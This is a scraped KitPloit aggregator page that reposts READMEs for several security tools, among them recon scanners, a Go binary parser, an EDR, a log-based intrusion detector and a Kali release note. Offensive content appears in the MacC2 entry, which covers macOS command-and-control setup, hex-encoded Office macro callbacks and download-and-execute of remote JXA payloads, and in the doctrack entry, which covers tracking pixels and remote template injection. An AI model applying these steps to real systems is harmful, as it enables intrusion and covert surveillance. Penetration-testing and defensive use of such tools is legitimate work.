Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

FinalRecon v1.1.0 - The Last Web Recon Tool You'll Need

$
0
0


FinalRecon is an automatic web reconnaissance tool written in python. Goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another it can provide similar results keeping dependencies small and simple.


Features

FinalRecon provides detailed information such as :

  • Header Information
  • Whois
  • SSL Certificate Information
  • Crawler
    • html
      • CSS
      • Javascripts
      • Internal Links
      • External Links
      • Images
    • robots
    • sitemaps
    • Links inside Javascripts
    • Links from Wayback Machine from Last 1 Year
  • DNS Enumeration
    • A, AAAA, ANY, CNAME, MX, NS, SOA, TXT Records
    • DMARC Records
  • Subdomain Enumeration
    • Data Sources
      • BuffOver
      • crt.sh
      • ThreatCrowd
      • AnubisDB
      • ThreatMiner
      • Facebook Certificate Transparency API
        • Auth Token is Required for this source, read Configuration below
  • Traceroute
    • Protocols
      • UDP
      • TCP
      • ICMP
  • Directory Searching
    • Support for File Extensions
    • Directories from Wayback Machine from Last 1 Year
  • Port Scan
    • Fast
    • Top 1000 Ports
    • Open Ports with Standard Services
  • Export
    • Formats
      • txt
      • xml
      • csv

Configuration

API Keys

Some Modules Use API Keys to fetch data from different resources, these are optional, if you are not using an API key, they will be simply skipped. If you are interested in using these resources you can store your API key in keys.json file.

Path --> finalrecon/conf/keys.json

If you dont want to use a key for a certain data source just set its value to null, by default values of all available data sources are null.


Facebook Developers API

This data source is used to fetch Certificate Transparency data which is used in Sub Domain Enumeration

Key Format : APP-ID|APP-SECRET

Example :

{
"facebook": "9go1kx9icpua5cm|20yhraldrxt6fi6z43r3a6ci2vckkst3"
}

Read More : https://developers.facebook.com/docs/facebook-login/access-tokens


Tested on
  • Kali Linux
  • BlackArch Linux

FinalRecon is a tool for Pentesters and it's designed for Linux based Operating Systems, other platforms like Windows and Termux are NOT supported.


Installation

BlackArch Linux
pacman -S finalrecon

SecBSD
doas pkg_add finalrecon

Kali Linux
git clone https://github.com/thewhiteh4t/FinalRecon.git
cd FinalRecon
pip3 install -r requirements.txt

Docker
docker pull thewhiteh4t/finalrecon
docker run -it --entrypoint /bin/sh thewhiteh4t/finalrecon

Usage
python3 finalrecon.py -h

usage: finalrecon.py [-h] [--headers] [--sslinfo] [--whois] [--crawl] [--dns] [--sub]
[--trace] [--dir] [--ps] [--full] [-t T] [-T T] [-w W] [-r] [-s]
[-sp SP] [-d D] [-e E] [-m M] [-p P] [-tt TT] [-o O]
url

FinalRecon - The Last Web Recon Tool You Will Need | v1.1.0

positional arguments:
url Target URL

optional arguments:
-h, --help show this help message and exit
--headers Header Information
--sslinfo SSL Certificate Information
--whois Whois Lookup
--crawl Crawl Target
--dns DNS Enumeration
--sub Sub-Domain Enumeration
--trace Traceroute
--dir Directory Search
--ps Fast Port Scan
--full Full Recon

Extra Options:
-t T Number of Threads [ Default : 30 ]
-T T Request Timeout [ Default : 30.0 ]
-w W Path to Wordlist [ Default : wordlists/dirb_common.txt ]
-r Allow Redirect [ Default : False ]
-s Toggle SSL Verification [ Default : True ]
-sp SP Specify SSL Port [ Default : 443 ]
-d D Custom DNS Servers [ Default : 1.1.1.1 ]
-e E File Extensions [ Example : txt, xml, php ]
-m M Traceroute Mode [ Default : UDP ] [ Available : TCP, ICMP ]
-p P Port for Traceroute [ Default : 80 / 33434 ]
-tt TT Traceroute Timeout [ Default : 1.0 ]
-o O Export Output [ Default : txt ] [ Available : xml, csv ]
# Check headers

python3 finalrecon.py --headers <url>

# Check ssl Certificate

python3 finalrecon.py --sslinfo <url>

# Check whois Information

python3 finalrecon.py --whois <url>

# Crawl Target

python3 finalrecon.py --crawl <url>

# Directory Searching

python3 finalrecon.py --dir <url> -e txt,php -w /path/to/wordlist

# full scan

python3 finalrecon.py --full <url>

Demo






Go_Parser - Yet Another Golang Binary Parser For IDAPro

$
0
0


Yet Another Golang Binary Parser For IDAPro

NOTE:

This master branch is written in Python2 for IDAPython, and tested only on IDA7.2/IDA7.0. If you use IDAPython with Python3 and higher version of IDAPro, please use Python3 Branch for go_parser.

Inspired by golang_loader_assist and jeb-golang-analyzer, I wrote a more complete Go binaries parsing tool for IDAPro.


Main Features:
  1. Locate and parse firstmoduledata structure in Go binary file, and make comment for each field;
  2. Locate pclntab(PC Line Table) according to the firstmoduledata and parse it. Then find and parse and recover function names and source file paths in the pclntab. Source file paths will be printed in the output window of IDAPro;
  3. Parse strings and string pointers, make comment for each string, and make dref for each string pointer;
  4. According to firstmoduledata, find each type and parse it, meke comment for each attribute of type, which will be very convenient for malware researcher to analyze a complex type or data structure definition;
  5. Parse itab(Interface Table).

Helpful information to RE work for Go binaries:



And there are two useful feature in go_parser:

  1. It also work fine for binaries with malformed File Header information, especially malformed Section Headers information;
  2. All those features above are valid for binaries built with buildmode=pie.

A config data structure in DDGMiner v5029 (MD5: 95199e8f1ab987cd8179a60834644663) parsing result as below:



And the user-defined source file paths list:



Project files:
  • go_parser.py:Entry file, press [Alt+F7] , select and execute this file;
  • common.py: Common variables and functions definition;
  • pclntbl.py: Parse pclntab(PC Line Table);
  • strings.py: Parse strings 和 string pointers;
  • moduldata.py: Parse firstmoduledata
  • types_builder.py: Parse types
  • itab.py: Parse itab(Interface Table).

Additionally, the str_ptr.py will parse string pointers by specify the start address and end address of string pointers manually.


Note
  1. This branch is written in Python2 for IDAPython, and tested only on IDA7.2/IDA7.0;
  2. The strings parsing module was migrated from golang_loader_assist, and I added the feature of string pointers parsing. It only supports x86(32bit & 64bit) architecture for now.

Refer
  1. Analyzing Golang Executables
  2. Reversing GO binaries like a pro
  3. Reconstructing Program Semantics from Go binaries.pdf
  4. Go二进制文件逆向分析从基础到进阶——综述
  5. Go二进制文件逆向分析从基础到进阶——MetaInfo、函数符号和源码文件路径列表
  6. Go二进制文件逆向分析从基础到进阶——数据类型
  7. Go二进制文件逆向分析从基础到进阶——itab与strings
  8. Go二进制文件逆向分析从基础到进阶——Tips与实战案例


Garud - An Automation Tool That Scans Sub-Domains, Sub-Domain Takeover And Then Filters Out XSS, SSTI, SSRF And More Injection Point Parameters

$
0
0


An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.



git clone https://github.com/R0X4R/Garud.git && cd Garud/ && chmod +x garud && mv garud /usr/local/bin/
  • Usage
garud -d target.com -f filename

About Garud

I made this tool to automate my recon and save my time. It really give me headache always type such command and then wait to complete one command and I type other command. So I collected some of the tools which is widely used in the bugbounty field. In this script I used Assetfinder, get-titles, httprobe, subjack, subzy, sublister, gau and gf patterns.
The script first enumerates all the subdomains of the give target domain using assetfinder and sublister then filters all live domains from the whole subdomain list then it extarct titles of the subdomains using get-title then it scans for subdomain takeover using subjack and subzy. Then it uses gau to extract paramters of the given subdomains then it use gf patterns to filters xss, ssti, ssrf, sqli params from that given subdomains. Then it'll save all the output in a text file like target-xss.txt. 


Thanks to the authors of the tools used in this script.

@aboul3la@tomnomnom@lc@LukaSikic@haccer

Warning: This code was originally created for personal use, it generates a substantial amount of traffic, please use with caution.



MacC2 - Mac Command And Control That Uses Internal API Calls Instead Of Command Line Utilities

$
0
0


MacC2 is a macOS post exploitation tool written in python that uses Objective C calls or python libraries as opposed to command line executions. The client is written in python2, which though deprecated is still being shipped with base Big Sur installs. It is possible down the road that Apple will remove python2 (or python altogether) from base macOS installs but as of Nov 2020 this is not the case. I wrote this tool to aid purple team exercises aimed at building detections for python-based post exploitation frameworks on macOS. Apple plans to eventu ally remove scripting runtimes from base macOS installs, but it appears that python is still included by default on base installs of Big Sur.


You can set up the server locally or you can use the docker setup I have included in this repo. Instructions below:


Instructions for Running Using Docker:

If you do not already have docker set up:

  1. chmod +x install_docker_linux.sh
  2. sudo ./install_docker_linux.sh

Next:

  1. chmod +x setup.sh
  2. sudo ./setup.sh(this will create an untrusted ssl cert and key, generate a macro file for the server and port you specify (will drop the macro in macro.txt locally), build macc2-docker, and run the MacC2 server inside of macc2-container in interactive mode)
  3. when prompted, enter the IP/hostname of the MacC2 server

  4. when prompted, enter the port that the MacC2 server will listen on

  5. A hex encoded macro payload will be dropped locally in a file named macro.txt that is configured to connect to your MacC2 server on the hostname/IP and port you specified.

  6. Docker will install the aiohttp python3 dependency, build macc2-docker, and will run the MacC2 Server in a container named macc2-container. Once finished the MacC2 server will listen on the specified port:

  7. You can run docker ps and validate that the MacC2 server is running (you will see a container named macc2-container listed there)

Note: Since I am using a static container name (macc2-container), if you run this setup more than once on the same server, you will need to delete the macc2-container name after each use or else you will get an error "The container name "/macc2-container" is already in use by container". You can run the command below to delete the macc2-container after each run:

docker rm macc2-container

You can then either copy the MacC2_client.py file over to the client and execute for a callback or you can import the macro.txt macro into an Office document and "Enable Macros" when opening for a callback on the client.


Running Locally (Without Using Docker)

If you opt to not use docker, you can set up the server locally using the steps below:

Since the MacC2 server uses the aiohttp library for communications, you will need to install aiohttp first:

pip install aiohttp(if you encounter an error ensure that pip is pointing to python3, since aiohttp is a python3 library):

python3 -m pip install --upgrade --force pip

On C2 Server:

  1. Set up ssl (note: use a key size of at least 2048)

If you do not have your own cert, you can use the following to generate a self signed cert:

  • 1: openssl req -new -newkey rsa:2048 -nodes -out ca.csr -keyout ca.key
  • 2: openssl x509 -trustout -signkey ca.key -days 365 -req -in ca.csr -out ca.pem

note: the server script is hard-coded to use ca.pem and ca.key, so keep these names the same for now, or change the code appropriately

  1. Use macro_generator.py to create the MacC2 scripts with the server's IP/domain and port. macro_generator.py also builds a macro (macro.txt) that uses hex encoding to run MacC2. You can copy and paste the contents of macro.text into an MS Office document:

Usage:

python3 macro_generatory.py -s [C2 Server IP/domain] -p [C2 Server Port]

-Example:


  1. Start the generated MacC2_server.py script to listen for a connection:


On Client Side (the target mac host):

  1. If you desire to not be limited by the mac sandbox and want more functionality, you may opt to copy the MacC2_client.py script to the client (assuming you have access).
  2. On the client, run the MacC2_client.py script: python MacC2_client.py


  1. On the server, you will see an inbound connection. Example below:


Using MacC2

After you receive a connection, you can use the "help" command on the server to get a list of built-in commands available. You can enter one of these commands. After entering a command and pressing Enter, the command is queued up (allows you to enter multiple commands to be executed by the client). Once you type "done" and hit Enter, all of the queued commands will be sent to the client for execution.


 

Each command is pretty straightforward. The command options that are not OPSEC safe (i.e., command line executions or cause pop ups) are also flagged in red from the help menu.

Functions of Note:

  • You can generate a Mythic C2 JXA .js payload, download it, and host it on a remote server. Then you can provide the url to the hosted file to MacC2 using the runjxa command to have MacC2 download and execute the Mythic .JXA payload:

>>> runjxa <url_to_JXA_.js_payload>

Note: If you gain access using the MS Office macro, then the persistence method will not work due to sandboxing. The files will still be dropped and the login item will still be inserted but upon reboot the quarantine attribute prevents the persistence from executing


Additional Info

The MacC2 server uses aiohttp to easily allow for asynchronous web comms. To ensure that only MacC2 agents can access the server, the server includes the following:

  • A specific user agent string check (if a request fails this check it receives a 404 Not Found)
  • A specific token (if a request failes this check it receives a 404 Not Found)

The operator flow after setting everything up and getting a callback is:

  • view help menu for command options
  • enter command name and press enter for each command you want to run
  • enter "done" and press enter to have the queued commands sent to the client for execution
  • NOTE: The default sleep is 10 seconds. The operator can change that by using the sleep [numberofseconds] command.
  • NOTE: The MacC2 server currently does not have a way to conveniently switch between sessions when multiple clients connect. Instead the server auto switches between sessions after each command executed. So the operator will need to pay attention to the IP in the connection to know which session is being interacted with.

Macro Limitations

MacC2 does NOT include any sandbox escapes and therefore all functions do not work when access is gained via the Office macro. Functions that DO work from the sandbox include:

  • runjxa
  • systeminfo
  • persist: MacC2 can drop files to disk from a sandboxed macro payload. However, upon reboot the persistence will not execute due to the quarantine attribue on the dropped files.
  • addresses
  • prompt
  • clipboard
  • shell (not OPSEC safe)
  • spawn (not OPSEC safe)
  • cd and listdir (sandbox prevents access for most directories but you can see the root '/' directory and potentially others as well)

DISCLAIMER

This is for academic purposes and should not be used maliciously or without the appropriate authorizations and approvals.



Gping - Ping, But With A Graph

$
0
0


Ping, but with a graph.


Install

FYI: The old Python version can be found under the python tag.


Homebrew (MacOS + Linux)
brew tap orf/brew
brew install gping

Binaries (Windows)

Download the latest release from the github releases page. Extract it and move it to a directory on your PATH.


Cargo

cargo install gping


Usage

Just run gping [host].

$ gping --help
gping 0.1.7
Ping, but with a graph.

USAGE:
gping [OPTIONS] <hosts>...

FLAGS:
-h, --help Prints help information
-V, --version Prints version information

OPTIONS:
-b, --buffer <buffer> Determines the number pings to display. [default: 100]

ARGS:
<hosts>... Hosts or IPs to ping


Rehex - Reverse Engineers' Hex Editor

$
0
0


A cross-platform (Windows, Linux, Mac) hex editor for reverse engineering, and everything else.


Features
  • Large (1TB+) file support
  • Decoding of integer/floating point value types
  • Disassembly of machine code
  • Highlighting and annotation of ranges of bytes
  • Side by side comparision of selections




Installation

The Releases page has standalone packages for Windows and Mac, as well as installable packages for popular Linux distributions, or you can install them from a distribution package repository as described below.

The same packages are also produced for Git commits (look for the tick), if you want to try the development/unreleased versions.


Debian

First, you will need to add my APT signing key to your system:

wget -qO - https://repos.solemnwarning.net/debian-key.gpg | sudo apt-key add -

Add the following lines to your /etc/apt/sources.list file:

deb http://repos.solemnwarning.net/debian/ CODENAME main
deb-src http://repos.solemnwarning.net/debian/ CODENAME main

Replace CODENAME with the version you're running (e.g. buster or stretch).

Finally, you can install the package:

$ sudo apt-get update
$ sudo apt-get install rehex

Ubuntu

First, you will need to add my APT signing key to your system:

wget -qO - https://repos.solemnwarning.net/ubuntu-key.gpg | sudo apt-key add -

Add the following lines to your /etc/apt/sources.list file:

deb http://repos.solemnwarning.net/ubuntu/ CODENAME main
deb-src http://repos.solemnwarning.net/ubuntu/ CODENAME main

Replace CODENAME with the version you're running (e.g. groovy for 20.10 or focal for 20.04).

Finally, you can install the package:

$ sudo apt-get update
$ sudo apt-get install rehex

NOTE: Ubuntu users must have the "Universe" package repository enabled to install some of the dependencies.


Fedora
$ sudo dnf copr enable solemnwarning/rehex
$ sudo dnf install rehex

CentOS
$ sudo dnf install epel-release
$ sudo dnf copr enable solemnwarning/rehex
$ sudo dnf install rehex

openSUSE
$ sudo zypper ar obs://editors editors
$ sudo zypper ref
$ sudo zypper in rehex

Building

If you want to compile on Linux, just check out the source and run make. You will need Jansson, wxWidgets and capstone installed, along with their development packages (Install build-essential, git, libwxgtk3.0-dev, libjansson-dev and libcapstone-dev on Ubuntu).

The resulting build can be installed using make install, which accepts all the standard environment variables.

For Windows or Mac build instructions, see the relevant README: README.Windows.mdREADME.OSX.md


Feedback

If you find any bugs or have suggestions for improvements or new features, please open an issue on Github, or join the #rehex IRC channel on irc.freenode.net.



OpenEDR - Open EDR Public Repository

$
0
0


We at OpenEDR believe in creating a cybersecurity platform with its source code openly available to public, where products and services can be provisioned and managed together. EDR is our starting point. OpenEDR is a full blown EDR capability. It is one of the most sophisticated, effective EDR code base in the world and with the community’s help it will become even better.


OpenEDR is free and its source code is open to public. OpenEDR allows you to analyze what’s happening across your entire environment at base-security-event level. This granularity enables accurate root-causes analysis needed for faster and more effective remediation. Proven to be the best way to convey this type of information, process hierarchy tracking provide more than just data, they offer actionable knowledge. It collects all the details on endpoints, hashes, and base and advanced events. You get detailed file and device trajectory information and can navigate single events to uncover a larger issue that may be compromising your system.

OpenEDR’s security architecture simplifies breach detection, protection and visibility by working for all threat vectors without requiring any other agent or solution. The agent records all telemetry information locally and then will send the data to locally hosted or cloud hosted ElasticSeach deployments. Real-time visibility and continuous analysis are the vital elements of the entire endpoint security concept. OpenEDR enables you to perform analysis into what's happening across your environment at base event level granularity. This allows accurate root cause analysis leading to better remediation of your compromises. Integrated Security Architecture of OpenEDR delivers Full Attack Vector Visibility including MITRE Framework.

The Open EDR consists of the following components:

  • Runtime components
    • Core Library – the basic framework;
    • Service – service application;
    • Process Monitor – components for per-process monitoring;
      • Injected DLL – the library which is injected into different processes and hooks API calls;
      • Loader for Injected DLL – the driver component which loads injected DLL into each new process
      • Controller for Injected DLL – service component for interaction with Injected DLL;
    • System Monitor – the genetic container for different kernel-mode components;
    • File-system mini-filter – the kernel component that hooks I/O requests file system;
    • Low-level process monitoring component – monitors processes creation/deletion using system callbacks
    • Low-level registry monitoring component – monitors registry access using system callbacks
    • Self-protection provider – prevents EDR components and configuration from unauthorized changes
    • Network monitor – network filter for monitoring the network activity;
  • Installer

Generic high-level interaction diagram for runtime components 


  For details you can refer here : https://techtalk.comodo.com/2020/09/19/open-edr-components/


Build Instructions

You should have Microsoft Visual Studio to build the code

  • Microsoft Visual Studio Solution File is under /openedr/edrav2/build/vs2019/
  • All OpenEDR Projects are in /openedr/edrav2/iprj folder
  • All external Projects and Libraries are in /openedr/edrav2/eprj folder

Libraries Used:

Roadmap

Please refer here for project roadmap : https://github.com/ComodoSecurity/openedr_roadmap/projects/1


Installation Instructions

OpenEDR is single agent that can be installed on Windows endpoints. It generates extensible telemetry data over all security relevant events. It also use file lookup, analysis and verdict systems from Comodo, https://valkyrie.comodo.com/. You can also have your own account and free license there.

The telemetry data is stored locally on the endpoint itself. You can use any log streaming solution and analysis platform. Here we will present, how can you do remote streaming and analysis via open source tools like Elasticsearch and Filebeat.


OpenEDR :

OpenEDR project will release installer MSI’s signed by Comodo Security Solutions, The default installation folder is C:\Program Files\OpenEdr\EdrAgentV2, currently we don’t have many option to edit/configure the rule set, alerts etc. Those will be coming with upcoming releases.

The agent outputs to C:\ProgramData\edrsvc\log\output_events by default, there you will see the EDR telemetry data where you should point this to Filebeat or other log streaming solutions you want.


Elasticsearch:

There are multiple options to run Elasticsearch, you can either install and run it on your own machine, on your data center or use Elasticsearch service on public cloud providers like AWS and GCP. If you want to run Elasticsearch by yourself. You can refer to here for installation instructions on various platforms https://www.elastic.co/guide/en/elasticsearch/reference/current/install-elasticsearch.html

Another option is using Docker, this will also enable a quick start for PoC and later can be extended to be production environment as well. You can access the guide for this setup here : https://www.elastic.co/guide/en/elasticsearch/reference/7.10/docker.html


Filebeat:

Filebeat is very good option to transfer OpenEDR outputs to Elasticsearch, you need to install Filebeat on each system you want to monitor. Overall instructions for it can be found here : https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-installation-configuration.html

We don’t have OpenEDR Filebeat modules yet so you need to configure custom input option for filebeat https://www.elastic.co/guide/en/beats/filebeat/current/configuration-filebeat-options.html


Releases

https://github.com/ComodoSecurity/openedr/releases/tag/2.0.0.0


Screenshots

How OpenEDR integration with a platform looks like and also a showcase for openedr capabilities

Detection / Alerting



Event Details



Dashboard



Process Timeline



Process Treeview



Event Search






Teler - Real-time HTTP Intrusion Detection

$
0
0


teler is an real-time intrusion detection and threat alert based on web log that runs in a terminal with resources that we collect and provide by the community.


Features
  • Real-time: Analyze logs and identify suspicious activity in real-time.

  • Alerting: teler provides alerting when a threat is detected, push notifications include Slack, Telegram and Discord.

  • Monitoring: We've our own metrics if you want to monitor threats easily, and we use Prometheus for that.

  • Latest resources: Collections is continuously up-to-date.

  • Minimal configuration: You can just run it against your log file, write the log format and let teler analyze the log and show you alerts!

  • Flexible log formats: teler allows any custom log format string! It all depends on how you write the log format in configuration file.

  • Incremental log processing: Need data persistence rather than buffer stream? teler has the ability to process logs incrementally through the on-disk persistence options.


Why teler?

teler was designed to be a fast, terminal-based threat analyzer. Its core idea is to quickly analyze and hunt threats in real time!


Installation

from Binary

The installation is easy. You can download a prebuilt binary from releases page, unpack and run! or run with:

▶ curl -sSfL 'https://ktbs.dev/get-teler.sh' | sh -s -- -b /usr/local/bin

using Docker

Pull the Docker image by running:

▶ docker pull kitabisa/teler

from Source

If you have go1.14+ compiler installed and configured:

▶ GO111MODULE=on go get -v -u ktbs.dev/teler/cmd/teler

In order to update the tool, you can use -u flag with go get command.


from GitHub
▶ git clone https://github.com/kitabisa/teler
▶ cd teler
▶ make build
▶ mv ./bin/teler /usr/local/bin

Usage

Simply, teler can be run with:

▶ [buffers] | teler -c /path/to/config/teler.yaml
# or
▶ teler -i /path/to/access.log -c /path/to/config/teler.yaml

If you've built teler with a Docker image:

▶ [buffers] | docker run -i --rm -e TELER_CONFIG=/path/to/config/teler.yaml teler
# or
▶ docker run -i --rm -e TELER_CONFIG=/path/to/config/teler.yaml teler --input /path/to/access.log

Flags
▶ teler -h

This will display help for the tool.


 

Here are all the switches it supports.

FlagDescriptionExamples
-c,
--config
teler configuration filekubectl logs nginx | teler -c /path/to/config/teler.yaml
-i,
--input
Analyze logs from data persistence rather than buffer streamteler -i /var/log/nginx/access.log
-x,
--concurrent
Set the concurrency level to analyze logs
(default: 20)
tail -f /var/log/nginx/access.log | teler -x 50
-o,
--output
Save detected threats to fileteler -i /var/log/nginx/access.log -o /tmp/threats.log
--jsonDisplay threats in the terminal as JSON formatteler -i /var/log/nginx/access.log --json
--rm-cacheRemove all cached resourcesteler --rm-cache
-v,
--version
Show current teler versionteler -v

Config

The -c flag is to specify teler configuration file.

▶ tail -f /var/log/nginx/access.log | teler -c /path/to/config/teler.yaml

This is required, but if you have defined TELER_CONFIG environment you don't need to use this flag, e.g.:

▶ export TELER_CONFIG="/path/to/config/teler.yaml"
▶ tail -f /var/log/nginx/access.log | teler
# or
▶ tail -f /var/log/nginx/access.log | TELER_CONFIG="/path/to/config/teler.yaml" teler

Input

Need log analysis incrementally? This -i flag is useful for that.

▶ teler -i /var/log/nginx/access.log

Concurrency

Concurrency is the number of logs analyzed at the same time. Default value teler provide is 20, you can change it by using -x flag.

▶ teler -i /var/log/nginx/access.log -x 50

Output

You can also save the detected threats into a file with -o flag.

▶ teler -i /var/log/nginx/access.log -o threats.log

JSON Format

If you want to display the detected threats as JSON format, switch it with --json flag.

▶ teler -i /var/log/nginx/access.log --json

Please note this will also apply if you save it to a file with -o flag.


Remove Caches

It will removes all stored resources in the user-level cache directory, see cache.

▶ teler --rm-cache

Configuration

teler requires a minimum of configuration to process and/or log analysis, and execute threats and/or alerts. See teler.example.yaml for an example.


Log Formats

Because we use gonx package to parse the log, you can write any log format. As an example:


Apache
log_format: |
$remote_addr - $remote_user [$time_local] "$request_method $request_uri $request_protocol" $status $body_bytes_sent

Nginx
log_format: |
$remote_addr $remote_user - [$time_local] "$request_method $request_uri $request_protocol"
$status $body_bytes_sent "$http_referer" "$http_user_agent"

Nginx Ingress
log_format: |
$remote_addr - [$remote_addr] $remote_user - [$time_local]
"$request_method $request_uri $request_protocol" $status $body_bytes_sent
"$http_referer" "$http_user_agent" $request_length $request_time
[$proxy_upstream_name] $upstream_addr $upstream_response_length $upstream_response_time $upstream_status $req_id

Amazon S3
log_format: |
$bucket_owner $bucket [$time_local] $remote_addr $requester $req_id $operationration $key
"$request_method $request_uri $request_protocol" $status $error_code $body_bytes_sent -
$total_time - "$http_referer" "$http_user_agent" $version_id $host_id
$signature_version $cipher_suite $http_auth_type $http_host_header $tls_version

Elastic LB
log_format: |
$time_local $elb_name $remote_addr $upstream_addr $request_processing_time
$upstream_processing_time $response_processing_time $status $upstream_status $body_received_bytes $body_bytes_sent
"$request_method $request_uri $request_protocol" "$http_user_agent" $cipher_suite $tls_version

CloudFront
log_format: |
$date $time $edge_location $body_bytes_sent $remote_addr
$request_method $http_host_header $requst_uri $status
$http_referer $http_user_agent $request_query $http_cookie $edge_type $req_id
$http_host_header $ssl_protocol $body_bytes_sent $response_processing_time $http_host_forwarded
$tls_version $cipher_suite $edge_result_type $request_protocol $fle_status $fle_encrypted_fields
$http_port $time_first_byte $edge_detail_result_type
$http_content_type $request_length $request_length_start $request_length_end

Threat rules

Cache

By default, teler will fetch external resources every time you run it, but you can switch external resources to be cached or not.

rules:
cache: true

If you choose to cache resources, it's stored under user-level cache directory of cross-platform and will be updated every day, see resources.


Excludes

We include resources for predetermined threats, including:

  • Common Web Attack
  • Bad IP Address
  • Bad Referrer
  • Bad Crawler
  • Directory Bruteforce

You can disable any type of threat in the excludes configuration (case-sensitive).

rules:
threat:
excludes:
- "Bad IP Address"

The above format detects threats that are not included as bad IP address, and will not analyze logs/ send alerts for that type.


Whitelists

You can also add whitelists to teler configuration.

rules:
threat:
whitelists:
- "(curl|Go-http-client|okhttp)/*"
- "^/wp-login\\.php"

It covers the entire HTTP request and processed as regExp, please write it with caution!


Notification

We provide alert notification options:

  • Slack,
  • Telegram
  • Discord

Configure the notification alerts needed on:

notifications:
slack:
token: "xoxb-..."
color: "#ffd21a"
channel: "G30SPKI"

telegram:
token: "123456:ABC-DEF1234...-..."
chat_id: "-111000"

discord:
token: "NkWkawkawkawkawka.X0xo.n-kmZwA8aWAA"
color: "16312092"
channel: "700000000000000..."

You can also choose to disable alerts or want to be sent where the alerts are.

alert:
active: true
provider: "slack"

Metrics

teler also supports metrics using Prometheus.


Prometheus

You can configure the host, port and endpoint to use Prometheus metrics in the configuration file.

prometheus:
active: true
host: "localhost"
port: 9099
endpoint: "/metrics"

Here are all the metrics we collected & categorized.

MetricDescription
teler_threats_count_totalTotal number of detected threats
teler_cwaGet lists of Common Web Attacks
teler_badcrawlerGet lists of Bad Crawler requests
teler_dir_bruteforceGet lists of Directories Bruteforced
teler_bad_referrerGet lists of Bad Referrer requests
teler_badip_countTotal number of Bad IP Addresses


Resources

All external resources used in this teler are NOT provided by us. See all peoples who involved in this resources at teler Resource Collections.





Kali Linux 2020.4 - Penetration Testing and Ethical Hacking Linux Distribution

$
0
0

 

Time for another Kali Linux release! – Kali Linux 2020.4. This release has various impressive updates:
  • ZSH is the new default shell– We said it was happening last time, Now it has. ZSH. Is. Now. Default.
  • Bash shell makeover– It may not function like ZSH, but now Bash looks like ZSH.
  • Partnership with tools authors– We are teaming up with byt3bl33d3r.
  • Message at login– Proactively pointing users to resources.
  • AWS image refresh– Now on GovCloud. Includes Kali’s default (command line) tools again. And there is a new URL.
  • Packaging Guides– Want to start getting your tool inside of Kali? This should help.
  • New Tools & Updates– New Kernel and various new tools and updates for existing ones, as well as setting Proxychains 4 as default.
  • NetHunter Updates– New NetHunter settings menu, select from different boot animations, and persistent Magisk.
  • Win-KeX 2.5– New “Enhanced Session Mode” brings Win-KeX to ARM devices
  • Vagrant & VMware– We now support VMware users who use Vagrant. 


More info here.


Doctrack - Tool To Manipulate And Insert Tracking Pixels Into Office Open XML Documents (Word, Excel)

$
0
0


Tool to manipulate and insert tracking pixels into Office Open XML documents.


Features
  • Insert tracking pixels into Office Open XML documents (Word and Excel)
  • Inject template URL for remote template injection attack
  • Inspect external target URLs and metadata
  • Create Office Open XML documents (#TODO)

Installation

You will need to download .Net Core SDK for your platform. Then, to build single binary on Windows:

$ git clone https://github.com/wavvs/doctrack.git
$ cd doctrack/
$ dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true

On Linux:

$ dotnet publish -r linux-x64 -c Release /p:PublishSingleFile=true

Usage
$ doctrack --help
Tool to manipulate and insert tracking pixels into Office Open XML documents.
Copyright (C) 2020 doctrack

-i, --input Input filename.
-o, --output Output filename.
-m, --metadata Metadata to supply (json file)
-u, --url URL to insert.
-e, --template (Default: false) If set, enables template URL injection.
-t, --type Document type. If --input is not specified, creates new
document and saves as --output.
-l, --list-types (Default: false) Lists available types for document
creation.
-s, --inspect (Default: false) Inspect external targets.
--help Display this help screen.

Available document types listed below. If you want to insert tracking URL just use either Document or Workbook types, other types listed here are only for document creation (#TODO).

$ doctrack --list-types
Document (*.docx)
MacroEnabledDocument (*.docm)
MacroEnabledTemplate (*.dotm)
Template (*.dotx)
Workbook (*.xlsx)
MacroEnabledWorkbook (*.xlsm)
MacroEnabledTemplateX (*.xltm)
TemplateX (*.xltx)

Insert tracking pixel and change document metadata:

$ doctrack -t Document -i test.docx -o test.docx --metadata metadata.json --url http://test.url/image.png

Insert remote template URL (remote template injection attack), works only with Word documents:

$ doctrack -t Document -i test.docx -o test.docx --url http://test.url/template.dotm --template

Inspect external target URLs and metadata:

$ doctrack -t Document -i test.docx --inspect
[External targets]
Part: /word/document.xml, ID: R8783bc77406d476d, URI: http://test.url/image.png
Part: /word/settings.xml, ID: R33c36bdf400b44f6, URI: http://test.url/template.dotm
[Metadata]
Creator:
Title:
Subject:
Category:
Keywords:
Description:
ContentType:
ContentStatus:
Version:
Revision:
Created: 13.10.2020 23:20:39
Modified: 13.10.2020 23:20:39
LastModifiedBy:
LastPrinted: 13.10.2020 23:20:39
Language:
Identifier:


Bulwark - An Organizational Asset And Vulnerability Management Tool, With Jira Integration, Designed For Generating Application Security Reports

$
0
0


An organizational asset and vulnerability management tool, with Jira integration, designed for generating application security reports.



Jira Integration



Note

Please keep in mind, this project is in early development.


Launch with Docker
  1. Install Docker
  2. Create a .env file and supply the following properties:
MYSQL_DATABASE="bulwark"
MYSQL_PASSWORD="bulwark"
MYSQL_ROOT_PASSWORD="bulwark"
MYSQL_USER="root"
MYSQL_DB_CHECK="mysql"
DB_PASSWORD="bulwark"
DB_URL="172.16.16.3"
DB_ROOT="root"
DB_USERNAME="bulwark"
DB_PORT=3306
DB_NAME="bulwark"
DB_TYPE="mysql"
NODE_ENV="production"
DEV_URL="http://localhost:4200"
PROD_URL="http://localhost:5000"
JWT_KEY="changeme"
JWT_REFRESH_KEY="changeme"
CRYPTO_SECRET="changeme"
CRYPTO_SALT="changeme"

Build and start Bulwark containers:

docker-compose up -d

Start/Stop Bulwark containers:

docker-compose start
docker-compose stop

Remove Bulwark containers:

docker-compose down

Bulwark will be available at localhost:5000


Local Installation
$ git clone (url)
$ cd bulwark
$ npm install

Run in development mode:

$ npm run start:dev

Run in production mode:

$ npm start

Environment variables

Create a .env file on the root directory. This will be parsed with dotenv by the application.


DB_PASSWORD

DB_PASSWORD="somePassword"

Set this variable to database password


DB_USERNAME

DB_USERNAME="foobar"

Set this variable to database user name


DB_URL

DB_URL=something-foo-bar.dbnet

Set this variable to database URL


DB_PORT

DB_PORT=3306

Set this variable to database port


